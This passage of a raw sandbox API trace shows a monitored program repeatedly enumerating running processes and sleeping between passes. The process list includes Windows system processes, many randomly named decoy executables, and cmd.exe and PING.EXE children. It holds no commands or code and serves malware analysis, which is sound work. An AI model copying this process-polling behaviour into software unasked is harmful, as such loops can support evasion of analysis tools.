(in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0101.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0101.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.110] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0101.115] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0101.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0101.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0101.119] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0101.120] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0101.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0101.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0101.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0101.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.127] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.129] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0101.130] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0101.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0101.183] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.184] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.186] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.187] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.188] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.191] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.195] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0101.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbe8, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0101.207] CloseHandle (hObject=0xbc) returned 1 [0101.207] Sleep (dwMilliseconds=0x12c) [0101.531] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0101.538] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.539] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.539] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 
[0101.542] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.542] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.544] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.544] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.546] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.546] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.549] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.549] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.550] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.551] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.552] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.553] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.554] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0101.555] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.557] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.558] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.559] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.560] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0101.561] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0101.562] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0101.563] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0101.565] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0101.612] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0101.614] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0101.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0101.616] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0101.617] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.618] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.619] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.620] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.621] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0101.622] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.623] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0101.624] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.625] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 